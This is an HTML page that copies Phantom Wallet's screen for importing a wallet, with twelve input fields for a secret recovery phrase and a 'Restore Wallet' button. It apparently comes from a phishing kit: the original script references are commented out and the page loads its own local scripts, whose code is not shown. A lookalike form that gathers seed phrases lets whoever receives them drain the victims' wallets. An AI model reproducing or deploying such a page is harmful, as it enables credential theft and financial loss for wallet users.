<!DOCTYPE html>
<html lang="en">
<head>
    <!-- <script nomodule="" defer="" src="/phishing.0cce3df4.js"></script>
    <script nomodule="" defer="" src="/metaplex.a7fe443c.js"></script>
    <script nomodule="" defer="" src="/metaplex.67571bb6.js"></script>
    <script nomodule="" defer="" src="/collectibles.f7823fac.js"></script>
    <script nomodule="" defer="" src="/staking.e599f575.js"></script>
    <script nomodule="" defer="" src="/swapper.71addccc.js"></script>
    <script nomodule="" defer="" src="/ConnectHardwareMultichainFlow.b8fb8db0.js"></script> -->
    <link rel="stylesheet" href=".//notification.5cbd182e.css">
    <!-- <script nomodule="" defer="" src="/multichainMigration.d4936f7c.js"></script>
    <script nomodule="" defer="" src="/onboarding.e6d78f0d.js"></script>
    <script type="module" src="/phishing.4cae5f62.js"></script>
    <script type="module" src="/metaplex.04cfb981.js"></script>
    <script type="module" src="/metaplex.8ad40d27.js"></script>
    <script type="module" src="/collectibles.4fd9b29c.js"></script>
    <script type="module" src="/staking.037c2788.js"></script>
    <script type="module" src="/swapper.c615a942.js"></script>
    <script type="module" src="/ConnectHardwareMultichainFlow.17d6d47e.js"></script>
    <script type="module" src="/connect_hardware.561c841e.js"></script>
    <script type="module" src="/onboarding.21ea182c.js"></script> -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="./popup.c34c79ff.css">
    <title>Phantom Wallet</title>
    <style data-styled="active" data-styled-version="5.3.3"></style>
</head>


<body> <noscript>You need to enable Javascript to run this application.</noscript>
    <div id="root">
        <header class="sc-kfPuZi geVIfj"><a href="https://phantom.app" target="_blank" rel="noopener noreferrer"
                class="sc-bBHxTw bqQWYl"><svg width="32" viewBox="0 0 269 224" xmlns="http://www.w3.org/2000/svg"
                    fill="#fff">
                    <path
                        d="M31.8301 224C66.1567 224 91.9536 194.147 107.349 170.557C105.476 175.776 104.436 180.995 104.436 186.006C104.436 199.784 112.342 209.596 127.944 209.596C149.373 209.596 172.257 190.807 184.115 170.557C183.283 173.48 182.867 176.194 182.867 178.699C182.867 188.302 188.276 194.356 199.302 194.356C234.045 194.356 268.995 132.772 268.995 78.9115C268.995 36.9506 247.775 0 194.517 0C100.899 0 0 114.401 0 188.302C0 217.32 15.603 224 31.8301 224ZM162.271 74.3187C162.271 63.8807 168.096 56.5741 176.626 56.5741C184.947 56.5741 190.773 63.8807 190.773 74.3187C190.773 84.7568 184.947 92.2721 176.626 92.2721C168.096 92.2721 162.271 84.7568 162.271 74.3187ZM206.792 74.3187C206.792 63.8807 212.617 56.5741 221.146 56.5741C229.468 56.5741 235.293 63.8807 235.293 74.3187C235.293 84.7568 229.468 92.2721 221.146 92.2721C212.617 92.2721 206.792 84.7568 206.792 74.3187Z">
                    </path>
                </svg></a><a data-testid="full-page-header-support-link" href="https://help.phantom.app" rel="noopener"
                target="_blank" class="sc-fKVqWL cEUDcm"><svg width="15" viewBox="0 0 15 15" fill="none"
                    xmlns="http://www.w3.org/2000/svg">
                    <path
                        d="M7.5 0C3.3589 0 0 3.3589 0 7.5C0 11.6411 3.3589 15 7.5 15C11.6411 15 15 11.6411 15 7.5C15 3.3589 11.6411 0 7.5 0ZM8.31288 11.7485C8.31288 12.0092 8.09816 12.2239 7.83742 12.2239H6.62577C6.36503 12.2239 6.15031 12.0092 6.15031 11.7485V10.9663C6.15031 10.7055 6.36503 10.4908 6.62577 10.4908H7.83742C8.09816 10.4908 8.31288 10.7055 8.31288 10.9663V11.7485ZM10.2301 7.08589C9.90798 7.53067 9.5092 7.88344 9.0184 8.14417C8.74233 8.32822 8.55828 8.51227 8.46626 8.72699C8.40491 8.86503 8.3589 9.04908 8.32822 9.2638C8.31288 9.43252 8.15951 9.55521 7.9908 9.55521H6.50307C6.30368 9.55521 6.15031 9.3865 6.16564 9.20245C6.19632 8.78834 6.30368 8.46626 6.47239 8.22086C6.68712 7.92945 7.07055 7.57669 7.6227 7.19325C7.91411 7.0092 8.12883 6.79448 8.29755 6.53374C8.46626 6.27301 8.54294 5.96626 8.54294 5.6135C8.54294 5.26074 8.45092 4.96932 8.25153 4.7546C8.05215 4.53988 7.79141 4.43252 7.43865 4.43252C7.14724 4.43252 6.91718 4.52454 6.71779 4.69325C6.59509 4.80061 6.5184 4.93865 6.47239 5.1227C6.41104 5.33742 6.21166 5.47546 5.98159 5.47546L4.60123 5.44479C4.43252 5.44479 4.29448 5.29141 4.30982 5.1227C4.35583 4.3865 4.64724 3.83436 5.15337 3.43558C5.7362 2.9908 6.48773 2.76074 7.43865 2.76074C8.45092 2.76074 9.24847 3.02147 9.83129 3.52761C10.4141 4.03374 10.7055 4.72393 10.7055 5.59816C10.7055 6.15031 10.5368 6.6411 10.2301 7.08589Z">
                    </path>
                </svg>
                <p color="#222222" size="16" opacity="1" class="sc-pVTFL fvwihz">Help</p>
            </a></header>
        <main class="sc-bYoBSM fTnnmq">
            <div style="opacity: 1;">
                <div width="100%" class="sc-iwjdpV sc-iJKOTD bqebhI qriss">
                    <div></div>
                    <div width="100%" class="sc-iwjdpV sc-giYglK lpdPCw cFiciA">
                        <div color="#AB9FF2" opacity="1" class="sc-cxpSdN ilKeQu"></div>
                        <div color="#333" opacity="1" class="sc-cxpSdN dozSWh"></div>
                        <div color="#333" opacity="1" class="sc-cxpSdN dozSWh"></div>
                        <div color="#333" opacity="1" class="sc-cxpSdN dozSWh"></div>
                    </div>
                </div>
            </div>
            <div class="sc-ikJyIC kPyPtm" style="opacity: 1; transform: none;">
                <form data-testid="onboarding-form" class="sc-jJoQJp jnMMrD">
                    <div width="100%" direction="column" class="sc-llYSUQ sc-cidDSM eRDBMJ">
                        <div width="100%" direction="column" class="sc-llYSUQ sc-hiCibw TzcwZ hHrFfF">
                            <p color="#FFFFFF" size="28" class="sc-pVTFL bQFsyX sc-gWXbKe cmIQsH" opacity="1">Secret
                                Recovery Phrase</p>
                            <p size="18" color="#999" class="sc-pVTFL ejwSVi sc-cCcXHH kHQTAC" opacity="1">Import an
                                existing wallet with your 12 or 24-word secret recovery phrase.</p>
                        </div>
                        <div class="sc-efQSVx epjcFx">
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">1.</p>
                                <input data-testid="secret-recovery-phrase-word-input-0" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">2.</p>
                                <input data-testid="secret-recovery-phrase-word-input-1" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">3.</p>
                                <input data-testid="secret-recovery-phrase-word-input-2" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">4.</p>
                                <input data-testid="secret-recovery-phrase-word-input-3" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">5.</p>
                                <input data-testid="secret-recovery-phrase-word-input-4" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">6.</p>
                                <input data-testid="secret-recovery-phrase-word-input-5" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">7.</p>
                                <input data-testid="secret-recovery-phrase-word-input-6" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">8.</p>
                                <input data-testid="secret-recovery-phrase-word-input-7" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">9.</p>
                                <input data-testid="secret-recovery-phrase-word-input-8" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">10.
                                </p><input data-testid="secret-recovery-phrase-word-input-9" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">11.
                                </p><input data-testid="secret-recovery-phrase-word-input-10" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                            <div width="100%" class="sc-iwjdpV sc-iAKWXU lpdPCw eKKaaQ">
                                <p size="14" color="#999999" class="sc-pVTFL bmdNYP sc-cTAqQK hDCJsD" opacity="1">12.
                                </p><input data-testid="secret-recovery-phrase-word-input-11" autocomplete="off"
                                    autocorrect="off" spellcheck="false" pattern="[A-Za-z\s]+" class="sc-jObWnj fdrVDH">
                            </div>
                        </div>
                        <div class="sc-dkYRCH hFeZMy">
                            <div width="100%" class="sc-iwjdpV sc-XxNYO lpdPCw kddAeL"><a
                                    data-testid="onboarding-import-secret-recovery-phrase-num-words-toggle"
                                    class="sc-ilfuhL sXAxc">I have a 24-word recovery phrase</a></div>
                        </div>
                    </div><button data-testid="onboarding-form-submit-button" type="submit" disabled="" font-size="16"
                        font-weight="600" width="100%" class="sc-eCImPb dZFTzD">Restore Wallet</button>
                </form>
            </div>
        </main>
    </div>
    <script type="module" src="./onboarding.73050969.js"></script>
    <script src="./onboarding.15bedbe1.js" nomodule="" defer=""></script>
</body>
</html>